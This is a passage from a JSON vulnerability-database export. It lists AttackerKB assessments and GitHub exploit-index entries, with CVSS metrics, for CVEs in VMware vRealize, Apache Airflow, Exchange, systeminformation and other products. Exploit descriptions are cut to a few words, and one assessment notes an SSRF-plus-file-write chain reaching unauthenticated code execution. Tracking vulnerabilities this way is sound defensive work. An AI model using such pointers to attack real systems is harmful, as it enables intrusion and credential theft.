2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-20T00:00:00", "type": "attackerkb", "title": "CVE-2020-13671", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2020-12-04T00:00:00", "id": "AKB:41008AC2-6B4D-484A-9C98-37DB9FC09AE1", "href": "https://attackerkb.com/topics/UUjNARl5Ha/cve-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T17:20:03", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14864", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14864"], "modified": "2020-10-22T00:00:00", "id": "AKB:414279F0-5C79-45FF-ADC4-B00C0B17871D", "href": "https://attackerkb.com/topics/sM1eoX7sAX/cve-2020-14864", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-05-27T14:37:37", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 31, 2021 10:35pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>) or [CVE-2021-21983\u2019s assessment](<https://attackerkb.com/assessments/fce71f33-eb17-490f-a80e-c4cd5059e0dc>).\n\n**Update:** According to GreyNoise, [attackers are scanning for CVE-2021-21975](<https://twitter.com/nathanqthai/status/1379888484865957891>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21975", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-06-05T00:00:00", "id": "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95", "href": "https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T14:33:30", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 03, 2021 7:41am UTC reported:\n\nPlease see [CVE-2021-21975\u2019s Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>). CVE-2021-21975 can be chained with CVE-2021-21983 to achieve unauthed RCE.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21983", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-06T00:00:00", "id": "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "href": "https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-12T14:00:38", "description": "# CVE-2020-11978: Remote code execution in Apache Airflow's Exa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-22T15:58:01", "type": "githubexploit", "title": "Exploit for Command Injection in Apache Airflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13927"], "modified": "2022-03-12T08:27:13", "id": "873C5242-04CE-5F2F-94A2-1ED48BB27CEB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T10:01:15", "description": "<p align=\"center\">\n <img src=\"https://img.shields.io/badge/Ve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T17:19:12", "type": "githubexploit", "title": "Exploit for Interpretation Conflict in Aviatrix Controller", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2022-07-19T16:18:25", "id": "474D6E3C-62E7-510A-B8AB-493646E9B2E1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:38", "description": "# CVE-2021-40870\nUnrestricted upload of file with dange...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T05:35:40", "type": "githubexploit", "title": "Exploit for Interpretation Conflict in Aviatrix Controller", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-09T06:42:40", "id": "66AD8042-B9D2-5EC5-B1A6-E743A4AF2A7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T16:31:12", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-20T09:28:13", "type": "githubexploit", "title": "Exploit for Vulnerability in Octobercms October", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-01-20T09:30:12", "id": "FCAFCDD5-9440-5A5E-A5DD-51F88D1E4FC7", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:27:38", "description": "# CVE-2021-21315 Exploit\n- Des:\n\n\nMy python Scri...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-18T01:18:31", "type": "githubexploit", "title": "Exploit for OS Command Injection in Systeminformation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-07-18T16:23:04", "id": "0E5869D4-37E8-526B-AD35-C6828C824560", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T03:46:34", "description": "# CVE-2021-21315-systeminformation\nThis is Proof of Concept for ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-01T18:52:41", "type": "githubexploit", "title": "Exploit for OS Command Injection in Systeminformation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2022-08-14T18:56:52", "id": "972035A3-EFCA-59B4-BEF3-038086C30C32", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:32", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-04T11:47:18", "type": "githubexploit", "title": "Exploit for OS Command Injection in Systeminformation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-03-13T02:06:37", "id": "6F08577F-952F-55B0-859B-596C18FE4C8E", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:44:11", "description": "# the CVE-2021-21315's exploit code wrote with Rust lang\n\nI'm ru...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T06:40:17", "type": "githubexploit", "title": "Exploit for OS Command Injection in Systeminformation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-12-27T01:30:24", "id": "6F52B47B-D9D5-5505-93DA-8E52F6FD6F22", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-31T18:30:14", "description": "## CVE-2021-33766 (ProxyToken)\n\n\u652f\u6301\u5355\u4e2a\u76ee\u6807\u68c0\u6d4b\u548c\u6279\u91cf\u68c0\u6d4b\u3001\u652f\u6301\u90ae\u4ef6\u8f6c\u53d1\u89c4\u5219\u4fee\u6539...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-09-15T09:09:20", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2022-03-31T04:32:57", "id": "F9AE0566-F0C6-57A4-8F79-DD8EB0A3BE64", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:46", "description": "## POC Exploit CVE-2021-33766 (ProxyToken)\n\nPOC Exploit for CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-08-31T22:03:13", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2023-05-05T16:11:57", "id": "F33D3024-CAB5-53F3-9685-6A1E68156853", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-05-21T15:56:32", "description": "# VMWare-vRealize-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T12:56:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-05-21T13:18:48", "id": "1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-30T20:26:21", "description": "# CVE-2021-21975\nNmap script to check vulnerability CVE-2021-219...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-01T21:59:05", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-30T17:32:47", "id": "7A372D54-3708-5032-B00A-2B54C2137FB7", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-23T13:06:08", "description": "# CVE-2021-21975\n\n#SSRF-POC - ssrf to cred leak\n\n#First configur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T13:33:45", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-23T07:58:27", "id": "35114B1B-006F-5732-8E42-9E8643B61C2A", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# VMWare-CVE-2021-21975\n\n# VMWare-CVE-2021-21975 SSRF vulnerabil...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-10T12:36:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2021-12-03T00:24:52", "id": "7663BC50-C08E-5741-B771-BE50606E7B78", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "<b>[CVE-2021-21975] VMware vRealize Operations Manager API Serve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", 